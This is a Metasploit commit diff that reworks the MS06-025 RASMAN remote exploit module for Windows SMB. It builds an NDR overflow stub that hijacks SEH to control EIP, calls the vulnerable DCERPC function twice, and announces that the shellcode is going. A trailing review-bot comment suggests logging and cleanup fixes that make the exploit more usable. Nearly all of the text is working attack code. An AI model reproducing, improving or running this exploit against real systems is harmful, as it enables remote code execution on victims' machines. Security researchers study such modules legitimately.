Closer...
git-svn-id: file:///home/svn/framework3/trunk@3713 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
0cf2909fda
commit
bb0def749f
|
@ -54,32 +54,38 @@ class Exploits::Windows::Smb::MS06_025_RASMANS_REG < Msf::Exploit::Remote
|
||||||
print_status("Binding to #{handle}")
|
print_status("Binding to #{handle}")
|
||||||
dcerpc_bind(handle)
|
dcerpc_bind(handle)
|
||||||
print_status("Bound to #{handle}")
|
print_status("Bound to #{handle}")
|
||||||
|
|
||||||
|
# This ends up mapping to invalid unicode and breaks the exploit
|
||||||
|
patt = Rex::Text.pattern_create(1024)
|
||||||
|
|
||||||
|
# This triggers eip = 0x51515151 after seh is triggered
|
||||||
|
patt = "\x51" * 1024
|
||||||
|
|
||||||
type2 =
|
type2 =
|
||||||
NDR.wstring("\x41" * 255) +
|
NDR.string( ("\x41" * 1024) + "\x00" ) +
|
||||||
NDR.wstring("\x41" * 4096) +
|
NDR.string( (patt) + "\x00" ) +
|
||||||
NDR.wstring("\x41" * 4096) +
|
NDR.string( ("\x61" * 4096) + "\x00" ) +
|
||||||
NDR.long(4) +
|
NDR.long(4) +
|
||||||
NDR.long(4)
|
NDR.long(4)
|
||||||
|
|
||||||
type1 =
|
type1 =
|
||||||
NDR.long(4) +
|
NDR.long(4) + # OperatorDial
|
||||||
NDR.long(4) +
|
NDR.long(4) + # PreviewPhoneNumber
|
||||||
NDR.long(4) +
|
NDR.long(4) + # UseLocation
|
||||||
NDR.long(4) +
|
NDR.long(4) + # ShowLights
|
||||||
NDR.long(4) +
|
NDR.long(4) + # ShowConnectStatus
|
||||||
NDR.long(4) +
|
NDR.long(4) + # CloseOnDial
|
||||||
NDR.long(4) +
|
NDR.long(4) + # AllowLogonPhonebookEdits
|
||||||
NDR.long(4) +
|
NDR.long(4) + # AllowLogonLocationEdits
|
||||||
NDR.long(4) +
|
NDR.long(4) + # SkipConnectComplete
|
||||||
NDR.long(4) +
|
NDR.long(4) + # NewEntryWizard
|
||||||
NDR.long(4) +
|
NDR.long(4) + # RedialAttempts
|
||||||
NDR.long(4) +
|
NDR.long(4) + # RedialSeconds
|
||||||
NDR.long(4) +
|
NDR.long(4) + # IdleHangUpSeconds
|
||||||
NDR.long(4) +
|
NDR.long(4) + # RedialOnLinkFailure
|
||||||
NDR.long(4) +
|
NDR.long(4) + # PopupOnTopWhenRedialing
|
||||||
NDR.long(4) +
|
NDR.long(4) + # ExpandAutoDialQuery
|
||||||
NDR.long(4) +
|
NDR.long(4) + # CallbackMode
|
||||||
|
|
||||||
NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc
|
NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc
|
||||||
NDR.wstring("\x00" * 129) +
|
NDR.wstring("\x00" * 129) +
|
||||||
|
@ -103,10 +109,18 @@ class Exploits::Windows::Smb::MS06_025_RASMANS_REG < Msf::Exploit::Remote
|
||||||
|
|
||||||
stubdata = type1 + NDR.long(4)
|
stubdata = type1 + NDR.long(4)
|
||||||
print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')
|
print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')
|
||||||
print_status('Calling the vulnerable function...')
|
|
||||||
|
|
||||||
begin
|
begin
|
||||||
|
print_status('One for the money...')
|
||||||
response = dcerpc.call(0xA, stubdata)
|
response = dcerpc.call(0xA, stubdata)
|
||||||
|
|
||||||
|
print_status('Two for the show...')
|
||||||
|
response = dcerpc.call(0xA, stubdata)
|
||||||
|
|
||||||
|
print_status('Three to get ready...')
|
||||||
|
print_status('Go shellcode, GO!')
|
||||||
|
|
||||||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
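Review bot: The `rescue Rex::Proto::DCERPC::Exceptions::NoResponse` closing the begin block in the second hunk has an empty body, so a call that gets no answer is dropped without any output and the status lines 'Three to get ready...' and 'Go shellcode, GO!' are skipped, leaving the operator unable to tell from the log whether the second call returned or timed out. A single status line in the rescue keeps the log honest: `rescue Rex::Proto::DCERPC::Exceptions::NoResponse` followed by `print_status('No response from the DCERPC call')`. Separately, in the first hunk the line `patt = Rex::Text.pattern_create(1024)` sits under a comment saying it breaks the exploit yet is shown as a live statement that `patt = "\x51" * 1024` immediately overwrites; unless the rendering dropped a leading `#`, that line should be commented out or removed so the two assignments do not read as contradictory. The method enclosing both hunks starts before the first hunk and ends after the second.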